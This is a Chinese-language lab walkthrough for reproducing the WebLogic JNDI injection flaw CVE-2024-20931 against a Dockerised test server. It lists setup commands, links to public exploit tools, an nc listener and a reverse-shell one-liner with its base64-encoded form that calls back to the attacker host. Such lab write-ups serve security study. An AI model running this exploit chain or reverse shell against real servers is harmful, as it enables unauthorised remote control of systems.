漏洞编号：CVE-2024-20931

一、环境准备：

1台Windows主机（10.46.47.227）作为攻击机 | 1台centos虚拟机（192.168.172.172）作为目标机 | 虚拟机网络模式为nat

二、搭建漏洞环境

1、docker拉取镜像

1.1 docker pull ismaleiva90/weblogic12 | 我已先完成（截图丢失），大概4~5g，拉取问题：国内镜像证书失效

解决链接：https://www.cnblogs.com/digdeep/p/12236637.html

2、启动环境

2.1 docker run -dit -p 7001:7001 -p 7002:7002 --restart=always ismaleiva90/weblogic12:latest

3、访问网页

3.1 查看虚拟机ip命令：ifconfig

3.2 先在虚拟机中访问192.168.172.172:7001，加/console就是weblogic的控制页面(后半句无用)

3.3 再测试从Windows主机能否访问192.168.172.172::7001

三、利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

工具链接：https://github.com/welk1n/JNDI-Injection-Exploit
（同样需要Java环境）

1、利用该工具反弹shell（需编码）

1.1 在线编码工具：https://ares-x.com/tools/runtime-exec

bash -i >& /dev/tcp/攻击机ip/攻击机端口 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC40Ni40Ny4yMjcvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}

2、运行JNDI注入工具：java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "编 码后的反弹Shell命令" -A "攻击机IP"

四、利用CVE-2024-20931.jar工具

工具链接：https://github.com/dinosn/CVE-2024-20931

1、 下载到Windows主机中，Java环境需配置

我的为Java8

2、先检验一下漏洞

java -jar CVE-2024-20931.jar

2.1 从此图

2.2 到此图了，说明存在漏洞，就可以开启监听，nc -lvnp 4444

Windows需自行安装nc

3、此时就要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

3.1 填入10.46.47.227:1389/xgec8w

3.2 反弹监听成功

相关链接：https://mp.weixin.qq.com/s/XwQZ6BqWvU72O4XTXOlovg